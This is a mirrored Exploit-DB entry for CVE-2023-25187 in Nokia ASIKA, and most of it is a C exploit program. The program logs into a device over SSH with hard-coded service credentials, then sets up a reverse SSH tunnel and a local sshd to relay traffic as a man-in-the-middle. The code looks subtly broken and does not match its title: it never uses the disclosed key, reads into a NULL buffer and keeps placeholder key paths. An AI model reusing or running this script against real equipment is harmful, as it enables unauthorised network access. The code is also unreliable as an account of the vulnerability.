Nokia ASIKA 7.13.52 – Hard-coded private key disclosure

• Exploit Database
• 112 阅读

• 作者： Amirhossein Bahramizadeh
  日期： 2023-06-20
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51535/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133

  // Exploit Title: Nokia ASIKA 7.13.52 - Hard-coded private key disclosure // Date: 2023-06-20 // Exploit Author: Amirhossein Bahramizadeh // Category : Hardware // Vendor Homepage: https://www.nokia.com/about-us/security-and-privacy/product-security-advisory/cve-2023-25187/ // Version: 7.13.52 (REQUIRED) // Tested on: Windows/Linux // CVE : CVE-2023-25187   #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <unistd.h> #include <netinet/in.h> #include <arpa/inet.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/wait.h> #include <signal.h>   // The IP address of the vulnerable device char *host = "192.168.1.1";   // The default SSH port number int port = 22;   // The username and password for the BTS service user account char *username = "service_user"; char *password = "password123";   // The IP address of the attacker&apos;s machine char *attacker_ip = "10.0.0.1";   // The port number to use for the MITM attack int attacker_port = 2222;   // The maximum length of a message #define MAX_LEN 1024   // Forward data between two sockets void forward_data(int sock1, int sock2) { char buffer[MAX_LEN]; ssize_t bytes_read;   while ((bytes_read = read(sock1, buffer, MAX_LEN)) > 0) { write(sock2, buffer, bytes_read); } }   int main() { int sock, pid1, pid2; struct sockaddr_in addr; char *argv[] = {"/usr/bin/ssh", "-l", username, "-p", "2222", "-o", "StrictHostKeyChecking=no", "-o", "UserKnownHostsFile=/dev/null", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-i", "/path/to/private/key", "-N", "-R", "2222:localhost:22", host, NULL};   // Create a new socket sock = socket(AF_INET, SOCK_STREAM, 0);   // Set the address to connect to memset(&addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_port = htons(port); inet_pton(AF_INET, host, &addr.sin_addr);   // Connect to the vulnerable device if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) { fprintf(stderr, "Error connecting to %s:%d: %s\n", host, port, strerror(errno)); exit(1); }   // Send the SSH handshake write(sock, "SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10\r\n", 42); read(sock, NULL, 0);   // Send the username write(sock, username, strlen(username)); write(sock, "\r\n", 2); read(sock, NULL, 0);   // Send the password write(sock, password, strlen(password)); write(sock, "\r\n", 2);   // Wait for the authentication to complete sleep(1);   // Start an SSH client on the attacker&apos;s machine pid1 = fork(); if (pid1 == 0) { execv("/usr/bin/ssh", argv); exit(0); }   // Start an SSH server on the attacker&apos;s machine pid2 = fork(); if (pid2 == 0) { execl("/usr/sbin/sshd", "/usr/sbin/sshd", "-p", "2222", "-o", "StrictModes=no", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-o", "AuthorizedKeysFile=/dev/null", "-o", "HostKey=/path/to/private/key", NULL); exit(0); }   // Wait for the SSH server to start sleep(1);   // Forward data between the client and the server pid1 = fork(); if (pid1 == 0) { forward_data(sock, STDIN_FILENO); exit(0); } pid2 = fork(); if (pid2 == 0) { forward_data(STDOUT_FILENO, sock); exit(0); }   // Wait for the child processes to finish waitpid(pid1, NULL, 0); waitpid(pid2, NULL, 0);   // Close the socket close(sock);   return 0; }